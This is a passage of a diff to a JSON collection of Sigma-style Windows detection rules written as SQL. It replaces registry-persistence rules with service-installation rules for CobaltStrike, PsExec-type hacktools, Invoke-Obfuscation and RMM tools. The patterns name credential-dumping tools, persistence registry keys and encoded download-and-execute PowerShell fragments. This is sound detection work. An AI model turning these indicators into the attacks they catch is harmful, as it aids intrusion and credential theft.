'\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "Windows Registry Trust Record Modification", - "id": "295a59c1-7b79-4b47-a930-df12c15fc9c2", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Alerts on trust record modification within the registry, indicating usage of macros", - "author": "Antonlovesdnb", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%TrustRecords%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_trust_record_modification.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "Path To Screensaver Binary Modified", - "id": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1546.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate modification of screensaver" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\SCRNSAVE.EXE' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_modify_screensaver_binary_path.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "status": "test", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" - }, - { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "filename": "win_system_powershell_script_installed_as_service.yml" + }, + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Office Application Startup - Office Test", - "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "author": "omkar72", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1137.002" + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_event_office_test_regadd.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" 